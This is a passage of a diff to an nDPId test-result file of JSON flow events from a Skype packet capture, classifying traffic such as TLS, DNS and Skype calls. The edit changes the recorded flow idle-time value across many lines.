00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1106,8 +1106,8 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 